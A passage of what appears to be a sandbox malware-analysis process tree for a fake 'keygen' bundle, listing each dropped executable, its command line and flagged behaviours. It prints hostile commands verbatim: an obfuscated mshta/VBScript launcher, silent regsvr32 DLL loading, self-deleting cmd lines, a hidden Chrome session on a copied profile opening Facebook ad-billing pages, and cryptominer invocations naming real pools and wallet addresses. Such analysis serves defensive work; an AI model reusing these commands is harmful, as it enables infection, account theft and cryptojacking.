                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2768
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          PID:3016
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                            5⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:960
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                        keygen-step-1.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:2624
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                        keygen-step-5.exe
                                                                                                                        3⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:1448
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN ( "C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If """"== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL " , 0 ) )
                                                                                                                          4⤵
                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                          PID:904
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -Im "%~NXa" /f > NuL
                                                                                                                            5⤵
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:2648
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe
                                                                                                                              NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2640
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" VbscrIpT:cLose ( CReatEoBjeCt ( "wscRIpT.SheLL" ). RuN ( "C:\Windows\system32\cmd.exe /C Type ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If ""/pfztvgOHczW8518 ""== """" for %a In ( ""C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe"" ) do taskkill -Im ""%~NXa"" /f > NuL " , 0 ) )
                                                                                                                                7⤵
                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                PID:2932
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\system32\cmd.exe" /C Type "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" > NYuI1gZGXFxr8Q.exe &&sTart NYuI1gZGXFxr8Q.exe /pfztvgOHczW8518 &If "/pfztvgOHczW8518 "== "" for %a In ( "C:\Users\Admin\AppData\Local\Temp\NYuI1gZGXFxr8Q.exe" ) do taskkill -Im "%~NXa" /f > NuL
                                                                                                                                  8⤵
                                                                                                                                    PID:3124
                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                  "C:\Windows\System32\regsvr32.exe" .\xUHTZND.6T /U -S
                                                                                                                                  7⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                  PID:3276
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill -Im "keygen-step-5.exe" /f
                                                                                                                                6⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:2824
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                          keygen-step-2.exe
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Modifies system certificate store
                                                                                                                          PID:2312
                                                                                                                          • C:\Users\Admin\AppData\Roaming\85BD.tmp.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\85BD.tmp.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:3452
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\85BD.tmp.exe"
                                                                                                                              5⤵
                                                                                                                                PID:4088
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                  6⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:3148
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                              4⤵
                                                                                                                                PID:3460
                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                  ping 127.0.0.1
                                                                                                                                  5⤵
                                                                                                                                  • Runs ping.exe
                                                                                                                                  PID:3508
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                              keygen-step-3.exe
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:2864
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                4⤵
                                                                                                                                  PID:756
                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                    5⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:2796
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                keygen-step-4.exe
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                PID:3060
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Free.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:956
                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                                                                                                                    5⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1380
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\JoSetp.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Modifies system certificate store
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2928
                                                                                                                                  • C:\ProgramData\4158257.exe
                                                                                                                                    "C:\ProgramData\4158257.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:3384
                                                                                                                                  • C:\ProgramData\2177446.exe
                                                                                                                                    "C:\ProgramData\2177446.exe"
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    PID:3416
                                                                                                                                    • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                      "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:3932
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops Chrome extension
                                                                                                                                  PID:3496
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                    5⤵
                                                                                                                                      PID:3588
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                        6⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:3612
                                                                                                                                    • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                      xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                      5⤵
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      PID:4068
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                      5⤵
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                      PID:2356
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6764f50,0x7fef6764f60,0x7fef6764f70
                                                                                                                                        6⤵
                                                                                                                                          PID:3068
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1140 /prefetch:2
                                                                                                                                          6⤵
                                                                                                                                            PID:1320
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1392 /prefetch:8
                                                                                                                                            6⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:3176
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1648 /prefetch:8
                                                                                                                                            6⤵
                                                                                                                                              PID:3324
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2012 /prefetch:1
                                                                                                                                              6⤵
                                                                                                                                                PID:3356
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2004 /prefetch:1
                                                                                                                                                6⤵
                                                                                                                                                  PID:2956
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1996 /prefetch:1
                                                                                                                                                  6⤵
                                                                                                                                                    PID:2984
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1984 /prefetch:1
                                                                                                                                                    6⤵
                                                                                                                                                      PID:2512
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2564 /prefetch:1
                                                                                                                                                      6⤵
                                                                                                                                                        PID:3260
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3388 /prefetch:8
                                                                                                                                                        6⤵
                                                                                                                                                          PID:3684
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1108,16581358113843894350,4994550932149442466,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3488 /prefetch:2
                                                                                                                                                          6⤵
                                                                                                                                                            PID:1528
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:3036
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-2DJME.tmp\Install.tmp
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-2DJME.tmp\Install.tmp" /SL5="$D024A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1628
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-16SM5.tmp\Ultra.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-16SM5.tmp\Ultra.exe" /S /UID=burnerch1
                                                                                                                                                            6⤵
                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                            PID:1788
                                                                                                                                                            • C:\Program Files\Reference Assemblies\WXCKNVUMQJ\ultramediaburner.exe
                                                                                                                                                              "C:\Program Files\Reference Assemblies\WXCKNVUMQJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                              PID:3608
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-741GT.tmp\ultramediaburner.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-741GT.tmp\ultramediaburner.tmp" /SL5="$802BA,281924,62464,C:\Program Files\Reference Assemblies\WXCKNVUMQJ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                8⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                PID:2896
                                                                                                                                                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3724
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a3-16c58-86d-2f5bf-40741cef7606e\Hakobepoju.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a3-16c58-86d-2f5bf-40741cef7606e\Hakobepoju.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2912
                                                                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                8⤵
                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:3728
                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3728 CREDAT:275457 /prefetch:2
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:1984
                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3728 CREDAT:537612 /prefetch:2
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                  • NTFS ADS
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:2816
                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3728 CREDAT:1127439 /prefetch:2
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:748
                                                                                                                                                                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                                                                                                                                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3728 CREDAT:799762 /prefetch:2
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Modifies Internet Explorer settings
                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                  PID:3368
                                                                                                                                                              • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:3184
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:1768
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\DD66.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\DD66.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:3012
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\DD66.tmp.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\DD66.tmp.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:4072
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\DF2B.tmp.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\DF2B.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            PID:3732
                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                              -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w15698@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                              6⤵
                                                                                                                                                                PID:3940
                                                                                                                                                              • C:\Windows\system32\msiexec.exe
                                                                                                                                                                -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w13946 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                6⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                PID:4028
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\filee.exe"
                                                                                                                                                              5⤵
                                                                                                                                                                PID:3848
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 127.0.0.1
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:3864
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg6_6asg.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:960
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                              PID:3920
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\kabo.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                PID:2052
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2344
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-S1MSR.tmp\IrecCH6.tmp
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-S1MSR.tmp\IrecCH6.tmp" /SL5="$4033E,234767,151040,C:\Users\Admin\AppData\Local\Temp\RarSFX2\IrecCH6.exe"
                                                                                                                                                                5⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3484
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-PE2S6.tmp\player_record_48792.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-PE2S6.tmp\player_record_48792.exe" /S /UID=irecch6
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:1184
                                                                                                                                                                  • C:\Program Files\7-Zip\INOITBFQAK\irecord.exe
                                                                                                                                                                    "C:\Program Files\7-Zip\INOITBFQAK\irecord.exe" /VERYSILENT
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:2668
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-AIKJN.tmp\irecord.tmp
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-AIKJN.tmp\irecord.tmp" /SL5="$203A2,6139911,56832,C:\Program Files\7-Zip\INOITBFQAK\irecord.exe" /VERYSILENT
                                                                                                                                                                      8⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                      PID:1832
                                                                                                                                                                      • C:\Program Files (x86)\recording\i-record.exe
                                                                                                                                                                        "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                        9⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:2688
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\58-10f0e-23a-0a39b-990a587ed4b4e\Juxuzhucytu.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\58-10f0e-23a-0a39b-990a587ed4b4e\Juxuzhucytu.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3472
                                                                                                                                                                    • C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                      "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:3092
                                                                                                                                                                      • C:\Program Files\Internet Explorer\iexplore.exe
